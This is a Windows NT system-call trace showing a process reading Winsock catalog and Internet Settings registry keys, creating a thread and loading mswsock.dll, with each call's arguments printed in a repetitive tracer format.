0\0\0\2\0\0\0\0\30\0\0\0\324\1\0\0\30\343\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$\0&\0\340\346\26\0\0\0\0\0N\0a\0m\0e\0S\0p\0a\0c\0e\0_\0C\0a\0t\0a\0l\0o\0g\05\0"}, 900, ) }, 900, ) == 0x0
 03653   456   NtClose  (480, ... ) == 0x0
 03654   456   NtClose  (476, ... ) == 0x0
 03655   456   NtWaitForSingleObject  (464, 0, {0, 0}, ... ) == 0x102
 03656   456   NtCreateEvent  (0x1f0003, 0x0, 0, 0, ... 476, ) == 0x0
 03657   456   NtOpenKey  (0x2000000, {24, 468, 0x40, 0, 0,  (0x2000000, {24, 468, 0x40, 0, 0, "NameSpace_Catalog5"}, ... 480, ) }, ... 480, ) == 0x0
 03658   456   NtQueryValueKey  (480,  (480, "Serial_Access_Num", Partial, 144, ... TitleIdx=0, Type=4, Data="\4\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (480, "Serial_Access_Num", Partial, 144, ... TitleIdx=0, Type=4, Data="\4\0\0\0"}, 16, ) }, 16, ) == 0x0
 03659   456   NtNotifyChangeKey  (480, 476, 0, 0, 2011390432, 1, 0, 0, 0, 1, ... ) == 0x103
 03660   456   NtQueryValueKey  (480,  (480, "Serial_Access_Num", Partial, 144, ... TitleIdx=0, Type=4, Data="\4\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (480, "Serial_Access_Num", Partial, 144, ... TitleIdx=0, Type=4, Data="\4\0\0\0"}, 16, ) }, 16, ) == 0x0
 03661   456   NtOpenKey  (0x2000000, {24, 480, 0x40, 0, 0,  (0x2000000, {24, 480, 0x40, 0, 0, "00000004"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03662   456   NtQueryValueKey  (480,  (480, "Num_Catalog_Entries", Partial, 144, ... TitleIdx=0, Type=4, Data="\3\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (480, "Num_Catalog_Entries", Partial, 144, ... TitleIdx=0, Type=4, Data="\3\0\0\0"}, 16, ) }, 16, ) == 0x0
 03663   456   NtOpenKey  (0x2000000, {24, 480, 0x40, 0, 0,  (0x2000000, {24, 480, 0x40, 0, 0, "Catalog_Entries"}, ... 484, ) }, ... 484, ) == 0x0
 03664   456   NtOpenKey  (0x20019, {24, 484, 0x40, 0, 0,  (0x20019, {24, 484, 0x40, 0, 0, "000000000001"}, ... 488, ) }, ... 488, ) == 0x0
 03665   456   NtQueryValueKey  (488,  (488, "LibraryPath", Partial, 144, ... TitleIdx=0, Type=1, Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0S\0y\0s\0t\0e\0m\03\02\0\\0m\0s\0w\0s\0o\0c\0k\0.\0d\0l\0l\0\0\0"}, 80, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (488, "LibraryPath", Partial, 144, ... TitleIdx=0, Type=1, Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0S\0y\0s\0t\0e\0m\03\02\0\\0m\0s\0w\0s\0o\0c\0k\0.\0d\0l\0l\0\0\0"}, 80, ) }, 80, ) == 0x0
 03666   456   NtQueryValueKey  (488,  (488, "LibraryPath", Partial, 144, ... TitleIdx=0, Type=1, Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0S\0y\0s\0t\0e\0m\03\02\0\\0m\0s\0w\0s\0o\0c\0k\0.\0d\0l\0l\0\0\0"}, 80, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (488, "LibraryPath", Partial, 144, ... TitleIdx=0, Type=1, Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0S\0y\0s\0t\0e\0m\03\02\0\\0m\0s\0w\0s\0o\0c\0k\0.\0d\0l\0l\0\0\0"}, 80, ) }, 80, ) == 0x0
 03667   456   NtQueryValueKey  (488,  (488, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="T\0c\0p\0i\0p\0\0\0"}, 24, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (488, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="T\0c\0p\0i\0p\0\0\0"}, 24, ) }, 24, ) == 0x0
 03668   456   NtQueryValueKey  (488,  (488, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="T\0c\0p\0i\0p\0\0\0"}, 24, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (488, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="T\0c\0p\0i\0p\0\0\0"}, 24, ) }, 24, ) == 0x0
 03669   456   NtQueryValueKey  (488,  (488, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="T\0c\0p\0i\0p\0\0\0"}, 24, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (488, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="T\0c\0p\0i\0p\0\0\0"}, 24, ) }, 24, ) == 0x0
 03670   456   NtQueryValueKey  (488,  (488, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="T\0c\0p\0i\0p\0\0\0"}, 24, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (488, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="T\0c\0p\0i\0p\0\0\0"}, 24, ) }, 24, ) == 0x0
 03671   456   NtQueryValueKey  (488,  (488, "ProviderId", Partial, 144, ... TitleIdx=0, Type=3, Data="@\235\5"\236~\317\21\256Z\0\252\0\247\21+"}, 28, ) , Partial, 144, ... TitleIdx=0, Type=3, Data= (488, "ProviderId", Partial, 144, ... TitleIdx=0, Type=3, Data="@\235\5"\236~\317\21\256Z\0\252\0\247\21+"}, 28, ) \236~\317\21\256Z\0\252\0\247\21+"}, 28, ) == 0x0
 03672   456   NtQueryValueKey  (488,  (488, "AddressFamily", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03673   456   NtQueryValueKey  (488,  (488, "SupportedNameSpace", Partial, 144, ... TitleIdx=0, Type=4, Data="\14\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (488, "SupportedNameSpace", Partial, 144, ... TitleIdx=0, Type=4, Data="\14\0\0\0"}, 16, ) }, 16, ) == 0x0
 03674   456   NtQueryValueKey  (488,  (488, "Enabled", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (488, "Enabled", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0
 03675   456   NtQueryValueKey  (488,  (488, "Version", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (488, "Version", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 03676   456   NtQueryValueKey  (488,  (488, "StoresServiceClassInfo", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (488, "StoresServiceClassInfo", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 03677   456   NtClose  (488, ... ) == 0x0
 03678   456   NtOpenKey  (0x20019, {24, 484, 0x40, 0, 0,  (0x20019, {24, 484, 0x40, 0, 0, "000000000002"}, ... 488, ) }, ... 488, ) == 0x0
 03679   456   NtQueryValueKey  (488,  (488, "LibraryPath", Partial, 144, ... TitleIdx=0, Type=1, Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0S\0y\0s\0t\0e\0m\03\02\0\\0w\0i\0n\0r\0n\0r\0.\0d\0l\0l\0\0\0"}, 78, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (488, "LibraryPath", Partial, 144, ... TitleIdx=0, Type=1, Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0S\0y\0s\0t\0e\0m\03\02\0\\0w\0i\0n\0r\0n\0r\0.\0d\0l\0l\0\0\0"}, 78, ) }, 78, ) == 0x0
 03680   456   NtQueryValueKey  (488,  (488, "LibraryPath", Partial, 144, ... TitleIdx=0, Type=1, Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0S\0y\0s\0t\0e\0m\03\02\0\\0w\0i\0n\0r\0n\0r\0.\0d\0l\0l\0\0\0"}, 78, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (488, "LibraryPath", Partial, 144, ... TitleIdx=0, Type=1, Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0S\0y\0s\0t\0e\0m\03\02\0\\0w\0i\0n\0r\0n\0r\0.\0d\0l\0l\0\0\0"}, 78, ) }, 78, ) == 0x0
 03681   456   NtQueryValueKey  (488,  (488, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="N\0T\0D\0S\0\0\0"}, 22, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (488, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="N\0T\0D\0S\0\0\0"}, 22, ) }, 22, ) == 0x0
 03682   456   NtQueryValueKey  (488,  (488, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="N\0T\0D\0S\0\0\0"}, 22, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (488, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="N\0T\0D\0S\0\0\0"}, 22, ) }, 22, ) == 0x0
 03683   456   NtQueryValueKey  (488,  (488, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="N\0T\0D\0S\0\0\0"}, 22, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (488, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="N\0T\0D\0S\0\0\0"}, 22, ) }, 22, ) == 0x0
 03684   456   NtQueryValueKey  (488,  (488, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="N\0T\0D\0S\0\0\0"}, 22, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (488, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="N\0T\0D\0S\0\0\0"}, 22, ) }, 22, ) == 0x0
 03685   456   NtQueryValueKey  (488,  (488, "ProviderId", Partial, 144, ... TitleIdx=0, Type=3, Data="\3567&;\200\345\317\21\245U\0\300O\330\324\254"}, 28, ) , Partial, 144, ... TitleIdx=0, Type=3, Data= (488, "ProviderId", Partial, 144, ... TitleIdx=0, Type=3, Data="\3567&;\200\345\317\21\245U\0\300O\330\324\254"}, 28, ) }, 28, ) == 0x0
 03686   456   NtQueryValueKey  (488,  (488, "AddressFamily", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03687   456   NtQueryValueKey  (488,  (488, "SupportedNameSpace", Partial, 144, ... TitleIdx=0, Type=4, Data=" \0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (488, "SupportedNameSpace", Partial, 144, ... TitleIdx=0, Type=4, Data=" \0\0\0"}, 16, ) }, 16, ) == 0x0
 03688   456   NtQueryValueKey  (488,  (488, "Enabled", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (488, "Enabled", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0
 03689   456   NtQueryValueKey  (488,  (488, "Version", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (488, "Version", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 03690   456   NtQueryValueKey  (488,  (488, "StoresServiceClassInfo", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (488, "StoresServiceClassInfo", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 03691   456   NtClose  (488, ... ) == 0x0
 03692   456   NtOpenKey  (0x20019, {24, 484, 0x40, 0, 0,  (0x20019, {24, 484, 0x40, 0, 0, "000000000003"}, ... 488, ) }, ... 488, ) == 0x0
 03693   456   NtQueryValueKey  (488,  (488, "LibraryPath", Partial, 144, ... TitleIdx=0, Type=1, Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0S\0y\0s\0t\0e\0m\03\02\0\\0m\0s\0w\0s\0o\0c\0k\0.\0d\0l\0l\0\0\0"}, 80, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (488, "LibraryPath", Partial, 144, ... TitleIdx=0, Type=1, Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0S\0y\0s\0t\0e\0m\03\02\0\\0m\0s\0w\0s\0o\0c\0k\0.\0d\0l\0l\0\0\0"}, 80, ) }, 80, ) == 0x0
 03694   456   NtQueryValueKey  (488,  (488, "LibraryPath", Partial, 144, ... TitleIdx=0, Type=1, Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0S\0y\0s\0t\0e\0m\03\02\0\\0m\0s\0w\0s\0o\0c\0k\0.\0d\0l\0l\0\0\0"}, 80, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (488, "LibraryPath", Partial, 144, ... TitleIdx=0, Type=1, Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0S\0y\0s\0t\0e\0m\03\02\0\\0m\0s\0w\0s\0o\0c\0k\0.\0d\0l\0l\0\0\0"}, 80, ) }, 80, ) == 0x0
 03695   456   NtQueryValueKey  (488,  (488, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="N\0e\0t\0w\0o\0r\0k\0 \0L\0o\0c\0a\0t\0i\0o\0n\0 \0A\0w\0a\0r\0e\0n\0e\0s\0s\0 \0(\0N\0L\0A\0)\0 \0N\0a\0m\0e\0s\0p\0a\0c\0e\0\0\0"}, 98, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (488, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="N\0e\0t\0w\0o\0r\0k\0 \0L\0o\0c\0a\0t\0i\0o\0n\0 \0A\0w\0a\0r\0e\0n\0e\0s\0s\0 \0(\0N\0L\0A\0)\0 \0N\0a\0m\0e\0s\0p\0a\0c\0e\0\0\0"}, 98, ) }, 98, ) == 0x0
 03696   456   NtQueryValueKey  (488,  (488, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="N\0e\0t\0w\0o\0r\0k\0 \0L\0o\0c\0a\0t\0i\0o\0n\0 \0A\0w\0a\0r\0e\0n\0e\0s\0s\0 \0(\0N\0L\0A\0)\0 \0N\0a\0m\0e\0s\0p\0a\0c\0e\0\0\0"}, 98, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (488, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="N\0e\0t\0w\0o\0r\0k\0 \0L\0o\0c\0a\0t\0i\0o\0n\0 \0A\0w\0a\0r\0e\0n\0e\0s\0s\0 \0(\0N\0L\0A\0)\0 \0N\0a\0m\0e\0s\0p\0a\0c\0e\0\0\0"}, 98, ) }, 98, ) == 0x0
 03697   456   NtQueryValueKey  (488,  (488, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="N\0e\0t\0w\0o\0r\0k\0 \0L\0o\0c\0a\0t\0i\0o\0n\0 \0A\0w\0a\0r\0e\0n\0e\0s\0s\0 \0(\0N\0L\0A\0)\0 \0N\0a\0m\0e\0s\0p\0a\0c\0e\0\0\0"}, 98, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (488, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="N\0e\0t\0w\0o\0r\0k\0 \0L\0o\0c\0a\0t\0i\0o\0n\0 \0A\0w\0a\0r\0e\0n\0e\0s\0s\0 \0(\0N\0L\0A\0)\0 \0N\0a\0m\0e\0s\0p\0a\0c\0e\0\0\0"}, 98, ) }, 98, ) == 0x0
 03698   456   NtQueryValueKey  (488,  (488, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="N\0e\0t\0w\0o\0r\0k\0 \0L\0o\0c\0a\0t\0i\0o\0n\0 \0A\0w\0a\0r\0e\0n\0e\0s\0s\0 \0(\0N\0L\0A\0)\0 \0N\0a\0m\0e\0s\0p\0a\0c\0e\0\0\0"}, 98, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (488, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="N\0e\0t\0w\0o\0r\0k\0 \0L\0o\0c\0a\0t\0i\0o\0n\0 \0A\0w\0a\0r\0e\0n\0e\0s\0s\0 \0(\0N\0L\0A\0)\0 \0N\0a\0m\0e\0s\0p\0a\0c\0e\0\0\0"}, 98, ) }, 98, ) == 0x0
 03699   456   NtQueryValueKey  (488,  (488, "ProviderId", Partial, 144, ... TitleIdx=0, Type=3, Data=":$Bf\250;\246J\272\245.\13\327\37\335\203"}, 28, ) , Partial, 144, ... TitleIdx=0, Type=3, Data= (488, "ProviderId", Partial, 144, ... TitleIdx=0, Type=3, Data=":$Bf\250;\246J\272\245.\13\327\37\335\203"}, 28, ) }, 28, ) == 0x0
 03700   456   NtQueryValueKey  (488,  (488, "AddressFamily", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03701   456   NtQueryValueKey  (488,  (488, "SupportedNameSpace", Partial, 144, ... TitleIdx=0, Type=4, Data="\17\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (488, "SupportedNameSpace", Partial, 144, ... TitleIdx=0, Type=4, Data="\17\0\0\0"}, 16, ) }, 16, ) == 0x0
 03702   456   NtQueryValueKey  (488,  (488, "Enabled", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (488, "Enabled", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0
 03703   456   NtQueryValueKey  (488,  (488, "Version", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (488, "Version", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 03704   456   NtQueryValueKey  (488,  (488, "StoresServiceClassInfo", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (488, "StoresServiceClassInfo", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 03705   456   NtClose  (488, ... ) == 0x0
 03706   456   NtClose  (484, ... ) == 0x0
 03707   456   NtWaitForSingleObject  (476, 0, {0, 0}, ... ) == 0x102
 03708   456   NtClose  (468, ... ) == 0x0
 03709   456   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 03710   456   NtQuerySystemInformation  (Processor, 12, ... {system info, class 1, size 12}, 0x0, ) == 0x0
 03711   456   NtOpenKey  (0x1, {24, 48, 0x40, 0, 0,  (0x1, {24, 48, 0x40, 0, 0, "System\CurrentControlSet\Services\Winsock2\Parameters"}, ... 468, ) }, ... 468, ) == 0x0
 03712   456   NtQueryValueKey  (468,  (468, "Ws2_32NumHandleBuckets", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03713   456   NtClose  (468, ... ) == 0x0
 03714   456   NtAllocateVirtualMemory  (-1, 1515520, 0, 4096, 4096, 4, ... 1515520, 4096, ) == 0x0
 03715   456   NtDuplicateObject  (-1, -2, -1, 0x0, 0, 2, ... 468, ) == 0x0
 03716   456   NtClearEvent  (436, ... ) == 0x0
 03717   456   NtSetEvent  (436, ... 0x0, ) == 0x0
 03718   456   NtAllocateVirtualMemory  (-1, 0, 0, 1048576, 8192, 4, ... 21561344, 1048576, ) == 0x0
 03719   456   NtAllocateVirtualMemory  (-1, 22601728, 0, 8192, 4096, 4, ... 22601728, 8192, ) == 0x0
 03720   456   NtProtectVirtualMemory  (-1, (0x158e000), 4096, 260, ... (0x158e000), 4096, 4, ) == 0x0
 03721   456   NtCreateThread  (0x1f03ff, 0x0, -1, 1237668, 1238384, 1, ... 484, {452, 676}, ) == 0x0
 03722   456   NtQueryInformationThread  (484, Basic, 28, ... {ExitStatus=0x103,TebBaseAddress=0x7ffdb000,Pid=452,Tid=676,}, 0x0, ) == 0x0
 03723   456   NtRequestWaitReplyPort  (24, {28, 56, new_msg, 0, -1, 2012550901, 2012551117, 2012551179}  (24, {28, 56, new_msg, 0, -1, 2012550901, 2012551117, 2012551179} "\0\0\0\0\1\0\1\0\1\0\0\0\4\0\0\0\344\1\0\0\304\1\0\0\244\2\0\0" ... {28, 56, reply, 0, 452, 456, 1572, 0} "\0\0\0\0\1\0\1\0\0\0\0\0\4\0\0\0\344\1\0\0\304\1\0\0\244\2\0\0" )  ... {28, 56, reply, 0, 452, 456, 1572, 0}  (24, {28, 56, new_msg, 0, -1, 2012550901, 2012551117, 2012551179} "\0\0\0\0\1\0\1\0\1\0\0\0\4\0\0\0\344\1\0\0\304\1\0\0\244\2\0\0" ... {28, 56, reply, 0, 452, 456, 1572, 0} "\0\0\0\0\1\0\1\0\0\0\0\0\4\0\0\0\344\1\0\0\304\1\0\0\244\2\0\0" )  ) == 0x0
 03724   456   NtResumeThread  (484, ... 1, ) == 0x0
 03725   676   NtTestAlert  (... ) == 0x0
 03726   676   NtContinue  (22609200, 1, ...
 03727   676   NtRegisterThreadTerminatePort  (24, ... ) == 0x0
 03728   676   NtDuplicateObject  (-1, -2, -1, 0x0, 0, 2, ... 488, ) == 0x0
 03729   676   NtWaitForSingleObject  (464, 0, {0, 0}, ... ) == 0x102
 03730   676   NtAllocateVirtualMemory  (-1, 22597632, 0, 4096, 4096, 260, ...
 03731   456   NtCreateEvent  (0x100003, 0x0, 1, 0, ... 492, ) == 0x0
 03732   456   NtWaitForSingleObject  (492, 0, 0x0, ...
 03730   676   NtAllocateVirtualMemory  ... 22597632, 4096, ) == 0x0
 03733   676   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\mswsock.dll"}, 22605540, ... ) }, 22605540, ... ) == 0x0
 03734   676   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\mswsock.dll"}, 5, 96, ... 496, {status=0x0, info=1}, ) }, 5, 96, ... 496, {status=0x0, info=1}, ) == 0x0
 03735   676   NtCreateSection  (0xe, 0x0, 0x0, 16, 134217728, 496, ... 500, ) == 0x0
 03736   676   NtClose  (496, ... ) == 0x0
 03737   676   NtMapViewOfSection  (500, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 16, ... (0x1590000), 0x0, 229376, ) == 0x0
 03738   676   NtClose  (500, ... ) == 0x0
 03739   676   NtUnmapViewOfSection  (-1, 0x1590000, ... ) == 0x0
 03740   676   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\mswsock.dll"}, 22605856, ... ) }, 22605856, ... ) == 0x0
 03741   676   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\mswsock.dll"}, 5, 96, ... 500, {status=0x0, info=1}, ) }, 5, 96, ... 500, {status=0x0, info=1}, ) == 0x0
 03742   676   NtCreateSection  (0xf, 0x0, 0x0, 16, 16777216, 500, ... 496, ) == 0x0
 03743   676   NtQuerySection  (496, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0
 03744   676   NtClose  (500, ... ) == 0x0
 03745   676   NtMapViewOfSection  (496, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x71a50000), 0x0, 241664, ) == 0x0
 03746   676   NtClose  (496, ... ) == 0x0
 03747   676   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 03748   676   NtQuerySystemInformation  (Processor, 12, ... {system info, class 1, size 12}, 0x0, ) == 0x0
 03749   676   NtSetEventBoostPriority  (492, ...
 03732   456   NtWaitForSingleObject  ... ) == 0x0
 03750   456   NtWaitForSingleObject  (404, 0, 0x0, ... ) == 0x0
 03751   456   NtQueryInformationFile  (400, 1237688, 24, Standard, ... {status=0x0, info=24}, ) == 0x0
 03752   456   NtReleaseMutant  (404, ... 0x0, ) == 0x0
 03749   676   NtSetEventBoostPriority  ... ) == 0x0
 03753   676   NtCreateEvent  (0x1f0003, 0x0, 0, 0, ... 496, ) == 0x0
 03754   676   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\mswsock.dll"}, 22605184, ... ) }, 22605184, ... ) == 0x0
 03755   676   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "SYSTEM\CurrentControlSet\Services\Winsock\Parameters"}, ... 500, ) }, ... 500, ) == 0x0
 03756   676   NtQueryValueKey  (500,  (500, "Transports", Partial, 144, ... , Partial, 144, ...
 03757   456   NtOpenKey  (0x1, {24, 52, 0x40, 0, 0,  (0x1, {24, 52, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\UrlMon Settings"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03758   456   NtOpenKey  (0x20019, {24, 52, 0x40, 0, 0,  (0x20019, {24, 52, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Http Filters\RPA"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03759   456   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Http Filters\RPA"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03760   456   NtAllocateVirtualMemory  (-1, 1519616, 0, 4096, 4096, 4, ... 1519616, 4096, ) == 0x0
 03761   456   NtAllocateVirtualMemory  (-1, 1523712, 0, 4096, 4096, 4, ... 1523712, 4096, ) == 0x0
 03762   456   NtOpenKey  (0x20019, {24, 52, 0x40, 0, 0,  (0x20019, {24, 52, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"}, ... }, ...
 03756   676   NtQueryValueKey  ... TitleIdx=0, Type=7, Data= ... TitleIdx=0, Type=7, Data="T\0c\0p\0i\0p\0\0\0N\0e\0t\0B\0I\0O\0S\0\0\0\0\0"}, 42, ) }, 42, ) == 0x0
 03763   676   NtQueryValueKey  (500,  (500, "Transports", Partial, 144, ... TitleIdx=0, Type=7, Data="T\0c\0p\0i\0p\0\0\0N\0e\0t\0B\0I\0O\0S\0\0\0\0\0"}, 42, ) , Partial, 144, ... TitleIdx=0, Type=7, Data= (500, "Transports", Partial, 144, ... TitleIdx=0, Type=7, Data="T\0c\0p\0i\0p\0\0\0N\0e\0t\0B\0I\0O\0S\0\0\0\0\0"}, 42, ) }, 42, ) == 0x0
 03764   676   NtClose  (500, ... ) == 0x0
 03765   676   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "System\CurrentControlSet\Services\Tcpip\Parameters\Winsock"}, ... 500, ) }, ... 500, ) == 0x0
 03766   676   NtQueryValueKey  (500,  (500, "Mapping", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 03767   676   NtQueryValueKey  (500,  (500, "Mapping", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 03768   676   NtQueryValueKey  (500,  (500, "Mapping", Partial, 152, ... , Partial, 152, ...
 03762   456   NtOpenKey  ... 504, ) == 0x0
 03769   456   NtOpenKey  (0x20019, {24, 504, 0x40, 0, 0,  (0x20019, {24, 504, 0x40, 0, 0, "Ranges\"}, ... 508, ) }, ... 508, ) == 0x0
 03770   456   NtQueryKey  (508, 4, 176, ... {key info, class 4, size 40}, 40, ) == 0x0
 03771   456   NtClose  (508, ... ) == 0x0
 03772   456   NtWaitForSingleObject  (404, 0, 0x0, ... ) == 0x0
 03773   456   NtQueryInformationFile  (400, 1233676, 24, Standard, ... {status=0x0, info=24}, ) == 0x0
